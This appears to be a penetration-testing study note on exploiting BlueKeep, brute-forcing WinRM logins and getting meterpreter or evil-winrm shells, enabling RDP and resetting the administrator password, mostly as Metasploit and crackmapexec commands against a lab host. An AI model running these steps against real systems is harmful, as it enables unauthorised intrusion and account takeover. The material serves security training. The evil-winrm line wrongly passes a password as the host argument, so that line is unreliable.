RDP and WinRM Exploitation
RDP and WinRM Exploitation
Sections in This Note
Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)
BLUEKEEP is the name given to an RDP vulnerability in Windows that could potentially allow an attacker to remotely execute arbitrary code and gain access to a Windows system, and consequently the network the target is part of.
Confirm RDP running on the target:
nmap -p 3389 (IPaddress)
Verify the target is vulnerable:
msfconsole
use scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS (IPaddress)
run
Exploit:
use exploit/windows/rdp/cve_2019_0708_rce
set RHOSTS (ipaddress)
show targets
set target (number)
exploit
Exploiting WinRM
Windows Remote Management (WinRM) is a Windows remote management protocol that can facilitate remote access with Windows systems over HTTP(S). Uses port 5985 and 5986 (HTTPS).
We can utilize a utility called crackmapexec to perform a brute-force on WinRM to identify users and passwords, as well as execute commands on the target system.
We can also use a Ruby script called evil-winrm to obtain a command shell session on the target system.
Brute force attack using crackmapexec:
crackmapexec winrm (IPaddress) -u (username file path) -p (password file path)
Execute commands:
crackmapexec winrm (IPaddress) -u (username) -p (password) -x "(commands)"
Using evil-winrm:
evil-winrm.rb -u (username) -p '(password)' -i (password)
Exploiting WinRM
WinRM (Windows Remote Management) is a Windows remote management protocol used to:
- Remotely access and interact with Windows hosts on a local network.
- Remotely access and execute commands on Windows systems over the internet.
- Manage and configure Windows systems remotely.
Typically uses TCP port 5985 and 5986 (HTTPS). Implements access control and security through various forms of authentication. We can use MSF to identify WinRM users/passwords, execute commands, and obtain a meterpreter session.
service postgresql
msfconsole
workspace -a winrm
db_nmap -sS -sV -O (IPaddress)
use auxiliary/scanner/winrm/winrm_login
set USER_FILE (location)
set PASS_FILE (location)
set RHOST (IPaddress)
run
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME (uname)
set PASSWORD (password)
set CMD (command)
run
# To get a meterpreter session
use exploit/windows/winrm/winrm_script_exec
set USERNAME (uname)
set PASSWORD (password)
set FORCE_VBS true
run
Enabling RDP
RDP is a proprietary GUI remote access protocol developed by Microsoft, used to remotely connect and interact with a Windows system. Uses TCP port 3389 by default. RDP is disabled by default, but we can use an MSF exploit module to enable it. RDP authentication requires a legitimate user account and the user's clear-text password.
use post/windows/manage/enable_rdp
set SESSION (session number)
exploit
sessions 1
# (to change password: not recommended)
shell
net user administrator (new password)
# (make as background)
# To enable RDP
xfreerdp /u:administrator /p:(password) /v:(IPaddress)
External Sources
Related
Migrated from Unsorted Notes — Other Methods
Other Methods
Brute force to get credentials in WinRM:
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.0.0.173
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit
Execute command on target using winrm_cmd module:
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
Use winrm_script_exec exploit module for a meterpreter shell:
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit